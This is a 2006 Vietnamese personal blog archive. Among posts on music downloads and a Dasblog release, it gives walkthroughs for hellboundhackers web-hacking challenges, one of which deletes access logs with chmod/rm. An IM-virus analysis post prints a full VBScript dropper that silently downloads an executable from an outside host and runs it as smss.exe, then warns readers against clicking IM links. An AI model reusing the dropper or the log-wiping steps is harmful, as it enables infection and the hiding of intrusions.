Nó sẽ chuyển sang form thứ 2 : SQL Login, ở trên desc có nói có lỗ hổng trong SQL, bạn thử injection 1 cách đơn giản nhất xem nào.
Bài này khá thú vị đây ! happy
Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 09:04
Ý kiến [0]
Basic Web Hacking 6
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers : Basic Web Hacking 6
Yêu cầu : bacsic *nix command
Desc :
My friend Drake has found this new way on how to execute Unix Commands from a simple php file, but he was testing the security and the logs recorded his activities and reported it to the FBI and it chmod the file logs.txt, now the only chance for him to be safe is that you chmod the file to all+execute and delete that file and the other file that tracks people. Mr. Deitry also said the command to do all these action needs a $ in the begining

Ông bạn Drake của chúng ta muốn xóa dấu vết xâm nhập, tránh bị FBI túm big grin.
Thông tin khi xâm nhập sẽ được ghi vào file logs.txt, mục tiêu là cần xóa file này đi. Để xóa cái này chúng ta cần có 3 lệnh. (bài này hơi khó nên sẽ post cụ thể)
Lệnh 1 : mục đính chmod để có quyền xóa
$ chmod a+x logs/logs.txt
Lệnh 2 : xóa log hệ thống
$ rm logs/logs.txt
Lệnh 3 : xóa log ứng dụng
$ rm logs/track_logs.php

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 08:55
Ý kiến [0]
Basic Web Hacking 5
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 5
Yêu cầu : 1 chút về regular expression
Desc :
Asterix-Protect is an email search system that uses this new type of Asterix database to match your search and uses the same type of form like a login. And Asterix-Protect its a login system which also uses this advanced type Asterix database to match your username:password, this is a project that just started... If something is wrong or you have found a bug in our product, please contact us at problems@Asterix-Protect.org.

Khi view source bạn sẽ thấy :
<!--attention admin: * is a wildcard -->
và chú ý dòng : Asterix database to match your username:password
nếu bạn biết 1 chút về regular expression bạn sẽ biết ngay username:password ở đây có thể được match
bởi 1 kí tự nào đó. Kí tự đó chính là * mà chúng ta thấy ở trên, cái gọi là wildcard.
Vậy cách match đơn giản nhất của 1 email là gì ?
VD tên miền loại abc.com.vn match đơn giản là : *.com.vn vậy bạn biết cái cần điền vào ô "Enter Usernametongueassword:" là gì rồi chứ happy.

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 08:39
Ý kiến [0]
Basic Web Hacking 4
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers: Basic Web Hacking 4
Yêu cầu : 1 chút suy nghĩ
Desc :
ERROR: htpasswd.php file not found in basic4/
File htpasswd.php không có trong thư mục basic4/, vậy nó check pass ở đâu để lên lv 5 ?
Bạn hãy thử với basic5/ xem sao ?
Khi đó ban sẽ nhận được :
Your Password is "xxxxxx" (bí mật nhé big grin)
Vậy là bạn được thêm point rồi đó !
Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 08:32
Ý kiến [0]
Basic Web Hacking 3
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers:Basic Web Hacking 3
Yêu cầu : Kiến thức về trình duyệt
Desc:
Now, Drake learned how to make http user agents with php.
Wrong user_agent, bwh3_user_agent wasn't found

Ở đây nó yêu cầu mình đổi 1 agent khác cho phù hợp. Để đổi 1 agent khác bạn nên dùng Firefox với addon
"User Agent Switcher"
Download : https://addons.mozilla.org/firefox/59/
Sau khi cài xong bạn đổi agent sang : bwh3_user_agent rồi refresh lại là ok!

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 08:27
Ý kiến [0]
Basic Web Hacking 2
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers:Basic Web Hacking 2
Yêu cầu : HTML
Description : My friend Drake has begin to program in HTML and he made this IFRAME, but the host of the website has kicked him out, and he doesnt remeber where is this IFRAME reading it from.

Bài này yêu cầu tìm link của Frame trong trang. Cách đơn giản nhất là View-source và tìm thẻ iframe, bạn sẽ tìm được thông tin sau :
http://www.hellboundhackers.org/challenges/basic1/b2/index.php
Đó là cái bạn cần tìm, quá dễ phải ko nào ! ;-)

Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 08:20
Ý kiến [0]
Basic Web Hacking 1
(Được đăng bởi: Phạm Đức Hải)
hellboundhackers :Basic Web Hacking 1

Kiến thức yêu cầu : HTML
Bạn view source và tìm được dòng sau :
"it has four legs and most of the time its called 'man's best friend'"
Đây chính là gợi ý cho mật khẩu, bạn đoán được con vật gì rồi chứ,
nhớ là viết bằng tên tiếng Anh nhé!
Ý kiến [0] - Chuyên mục: Hack


18 Tháng Mười 2006
@ 08:13
Ý kiến [0]
Basic Web Hacking
(Được đăng bởi: Phạm Đức Hải)
Hôm nay, có nhã hứng post bài, nên tôi quyết định, từ hôm nay tôi sẽ post các bài liên quan đến Hacking tutorial.
Tôi sẽ giới thiệu với các bạn tất cả các solution cho các Challenges tại
http://www.hellboundhackers.org
Khi nào có hứng lại tiếp tục một số war games khác. (Tôi rất khoái war games)
hy vọng là các bạn sẽ tìm được cái gì đó cho riêng mình.
Với mục đích là các bài học nên tôi sẽ không post trực tiếp mật khẩu, tôi chỉ đưa ra các gợi ý, các bước làm để các bạn tự khám phá happy.
Bắt đầu nào !

Ý kiến [0] - Chuyên mục: Hack


09 Tháng Mười 2006
@ 11:36
Ý kiến [0]
Dasblog 1.9.6264.0 has released !!!
(Được đăng bởi: Phạm Đức Hải)
Phiên bản Dasblog 1.9.6264.0 đã có, một điều đặc biệt trong phiên bản này là có tiếng Việt.
 Scott Hanselman đã tích hợp bản tiếng Việt do Phạm Đức Hải việt hóa vào trong hệ thống, đặc biệt nữa là sẽ có culture vi-vn trong phiên bản này, nên toàn bộ ngày giờ sẽ được chuyển sang Tiếng Việt.
Phiên bản tiếng Việt do tôi việt hóa chưa được hoàn thiện lắm nếu bạn nào có thể làm tốt hơn hãy liên hệ
với tôi nhé !
Download bản Dasblog 1.9.6264.0 tại đây :
download here: 1.9.6264.0
Thanks Scott !!!


Ý kiến [0] - Chuyên mục: .NET |  CSharp | Ajax | Website


09 Tháng Mười 2006
@ 10:23
Ý kiến [0]
Toàn bộ link nhạc baokhanh.biz
(Được đăng bởi: Phạm Đức Hải)
Nhân dịp giải phóng Thủ đô - ngày mai (ko biết lấy lý do là gì nữa big grin),
Tặng các bạn link download > 1300 bài hát chất lượng cao của trang web baokhanh.biz
Các bạn lấy link ở đây nhé : (các bạn nhớ chia sẻ link này cho bạn bè nhé!)
http://nhacso.ajaxviet.com/all_music_file_baokhanh.txt

Chúc các bạn tìm được bài hát yêu thích ;-) !

Ý kiến [0] - Chuyên mục: Âm nhạc |  Lời bài hát | Giải trí


06 Tháng Mười 2006
@ 04:41
Ý kiến [0]
Trung thu
(Được đăng bởi: Phạm Đức Hải)

trung thu tết của thiếu nhi
chỉ thấy người lớn họ đi là nhiều
họ đi họ lại làm liều
làm liều rồi lại có nhiều thiếu nhi
thiếu nhi thì mặc thiếu nhi
bác sĩ nhiều lắm tội chi không liều

Thanks langtu !!!
Ý kiến [0] - Chuyên mục: Giải trí | Linh tinh


06 Tháng Mười 2006
@ 02:39
Ý kiến [0]
Nhạc Audition
(Được đăng bởi: Phạm Đức Hải)
Mới cập nhật : Nhạc Audition (tiếp) - 103 bài
Nhạc Audition - mới, có thể banwidth tại diendansonla hết, bạn sẽ kho down được, bạn hay down load bằng các link bên dưới.
Bài hát trong game Audition :
SweetDream (Tiếng Trung)
http://diendansonla.com/Jang Nara - Sweet Dreams.mp3
http://diendansonla.com/7NgayDoiMong_HienThuc.wma
http://diendansonla.com/BangKhuang_DoanTrang.wma
http://diendansonla.com/BlackEyesPeas_MyHumps.wma
http://diendansonla.com/ChoDoiQuaKhu_LBQ.wma
http://diendansonla.com/ImAWoman_JangNaRa.wma
http://diendansonla.com/OneLove_Master-j.wma
http://diendansonla.com/S-O-S_VersionVN.wma
http://diendansonla.com/SOS-KorVer-_Shine.wma
http://diendansonla.com/TanTrongHuVo.wma
http://diendansonla.com/TinhDaHaoGay_HienThuc.wma
http://diendansonla.com/TinhYeu_HoQuynhHuong.wma
http://diendansonla.com/TocHat_DoanTrang.wma
http://diendansonla.com/TuyetVong_HQH.wma
http://diendansonla.com/VoTinh_HoQuynhHuong.wma
Hoặc :
SweetDream_JangNaRa.wma
http://www.khanhonlineload.com/_/auupdate/7NgayDoiMong_HienThuc.wma
http://www.khanhonlineload.com/_/auupdate/BangKhuang_DoanTrang.wma
http://www.khanhonlineload.com/_/auupdate/BlackEyesPeas_MyHumps.wma
http://www.khanhonlineload.com/_/auupdate/ChoDoiQuaKhu_LBQ.wma
http://www.khanhonlineload.com/_/auupdate/ImAWoman_JangNaRa.wma
http://www.khanhonlineload.com/_/auupdate/OneLove_Master-j.wma
http://www.khanhonlineload.com/_/auupdate/S-O-S_VersionVN.wma
http://www.khanhonlineload.com/_/auupdate/SOS-KorVer-_Shine.wma
http://www.khanhonlineload.com/_/auupdate/TanTrongHuVo.wma
http://www.khanhonlineload.com/_/auupdate/TinhDaHaoGay_HienThuc.wma
http://www.khanhonlineload.com/_/auupdate/TinhYeu_HoQuynhHuong.wma
http://www.khanhonlineload.com/_/auupdate/TocHat_DoanTrang.wma
http://www.khanhonlineload.com/_/auupdate/TuyetVong_HQH.wma
http://www.khanhonlineload.com/_/auupdate/VoTinh_HoQuynhHuong.wma

Các bài nguyên gốc :
Download các bài hát trong bản đầu tiên
 Audition - 1,2 Fiesta
Audition - 3254 Techno Party
Audition - B Soul Funk
Audition - Beat City
Audition - Beautiful
Audition - Blackout House
Audition - Canon Groove
Audition - Can't Let You Go
Audition - Chinese Lady
Audition - Dance Dance
Audition - Dance Fish
Audition - Dance Flower
Audition - Destiny
Audition - Digital Soul
Audition - Disco World
Audition - DJ Euro Mix
Audition - Doo Doop
Audition - Dream Machine
Audition - Driving At Night
Audition - Elec Bossa
Audition - Euro 2005
Audition - Funky Town
Audition - Get On The Floor
Audition - Gloomy March
Audition - Go Go
Audition - Heavy Metal Syndrome
Audition - In The Groove
Audition - New York
Audition - Night
Audition - Roller Coast
Audition - Spain Moonlight
Audition - Swan Lake
Audition - Sweetie
Audition - U Know
Cool - All For You
Cool - Aloha
Cool - Destiny
Cool - Excuse
Cool - Lady From The Beach
Cool - Lamentation
Cool - Making Better World
Cool - That's All Right
Cool - Understanding Men and Women
DJ DOC - Dance With DOC
DJ DOC - Impersonal State
DJ DOC - Lets Go To The Beach
DJ DOC - Murphy's Law
DJ DOC - One Night
DJ DOC - Run To You
DJ DOC - The Beauty And The Beast
DJ DOC - Winter Story
Jewellery - Again
Jewellery - Super Star
Jung Hyun Lee - Come
Jung Hyun Lee - Going Crazy
Jung Hyun Lee - Half
Jung Hyun Lee - You
Kim Jong Kook - Star, Wind, Sun and Love (original lobby song)
Lobby1 (original lobby song)
M. Street - The One For Me (original lobby song)
Suh Ji Young - Stay In Me (original lobby song)
Whisung - The Day We Meet Again
Whisung - With Me

Update Pack 1:
Jung Hyun Lee - I'll Give
Pinkle - Blue Rain
Pinkle - Endless Love
Pinkle - Now
Pinkle - Ruby
Pinkle - To My Boyfriend
Turbo - Cyber Lover
Turbo - Forbidden
Turbo - Goodbye Yesterday
Turbo - Honeymoon
Turbo - I Have A Date!
Turbo - Love Forever
Turbo - Love Is
Turbo - My Childhood Dream
Turbo - Our Heaven
Turbo - Paradox
Turbo - Prayer
Turbo - Reminiscence
Turbo - Some Jazz Bar
Turbo - The Black Cat
Turbo - Tonight

Update Pack 2:
Cool - If You Will Get Married
Cool - One Summer Drive
Cool - Small Waiting
Cool - Ten Commandments
Jewellery - Cool Girl
Jewellery - Don't Tell Good Bye
Jewellery - Heart
Jewellery - Heavenly Love
Jewellery - How Are You
Jewellery - Love You
Jewellery - Now
Jewellery - Say
Jewellery - Small Prayer
Jewellery - Summer Night
Turbo - The Greatest Love
Turbo - Twist King
Turbo - White Love
Turtle - Four Seasons
Turtle - Let's Boogie
Ý kiến [0] - Chuyên mục: Âm nhạc |  Lời bài hát | Giải trí


06 Tháng Mười 2006
@ 09:35
Ý kiến [0]
Virus IM càng ngày càng tinh vi hơn
(Được đăng bởi: Phạm Đức Hải)

Sáng nay tôi nhận được 1 link ảnh như sau :

hxxp://my.http.vn/hinhvn/miss_thuy.jpg

View source thấy đoạn code sau :

<GIF89a 8 f >
<html>
<script>
if(frames)
{if(top.frames.length>0)
top.location.href=self.location;
}
</script>
<script language=JavaScript>
document.write(unescape('%0D%0A%3C%........%2Fb%6Fdy%3E%0D%0A'))
</script>
</html>

thủ đoạn ở đây là đuôi file : .jpg --> ko ai nghi nghờ cả (Chỉ bị đối với IE 5.x), cái này có vẻ giống Gaixinh.jpg

hơn nữa đoạn code đã được escape. Sau khi unescape nó sẽ như sau (đoạn được escape):

<script language="VBScript">
on error resume next
dl = "hxxp://my.http.vn/hinhvn/bt.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="smss.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<Center><h1><a href="http://www.vuonmongmo.com">Next</a></Center>
<Center><img src="hinh.jpg"></Center>
<br>
<Center><img border="0" alt="Free Web Counter" src="http://xyz.freeweblogger.com/counter/index.php?u=hanthien&s=7seg" ALIGN="middle" HSPACE="4" VSPACE="2"></Center>
<script src=http://xyz.freeweblogger.com/counter/script.php?u=hanthien></script>

Code hoàn toàn giống các con virus cũ, file lây nhiễm hxxp://my.http.vn/hinhvn/bt.exe chắc là cũng được viết bằng autoit (sẽ zem kỹ sau-->sau khi xem thấy ko decomplie được, chưa biết thế nào).

Các bạn hãy cảnh giác ko bấm vào bất kỳ link nào send qua IM.

Ý kiến [0] - Chuyên mục: Virus


02 Tháng Mười 2006
@ 10:07
Ý kiến [0]
Trang giải trí vui vẻ
(Được đăng bởi: Phạm Đức Hải)
Ủng hộ bạn bè phát nào winking
Xin giới thiệu với các bạn trang giải trí cực kỳ vui vẻ :

Xem247.com :: Ndkien.com

Nội dung chính:
+ Trò chơi: các trò chơi tuyển chọn...
+ Các trang web: về cuộc sống, tình yêu, những chùm ảnh vui...
+ Các đoạn phim vui: thể thao, giải trí, các đoạn quảng cáo vui...
+ Các đoạn flash hay: các trò chơi, bài hát, thư giãn, giải trí...

Nội dung mới bổ sung:
27/9/2006: bổ sung 318 funny flashes.
25/9/2006: bổ sung 168 flash games, 110+ video clips.
23/9/2006: bổ sung 160 video clips.
22/9/2006: bổ sung 3100+ ảnh vào mục fun pic.
12/9/2006: bổ sung 240+ video clips.
04/9/2006: bổ sung 1500 ảnh vào mục fun pic80+ video clips.
25/8/2006: bổ sung 2600+ ảnh vào mục fun pic60+ video clips.
10/6/2006: bổ sung 1100 ảnh vào mục fun pic, 500 flashes, 72 video clips.
27/5/2006: bổ sung 420 ảnh vào mục fun pic, 120 flashes.
10/5/2006: 1000+ ảnh vào mục fun pic, 200+ flashes.
Tổng kết: 9800+ ảnh vui, 1333+ flashes, 730+ video clips.

Ý kiến [0] - Chuyên mục: Giải trí | Website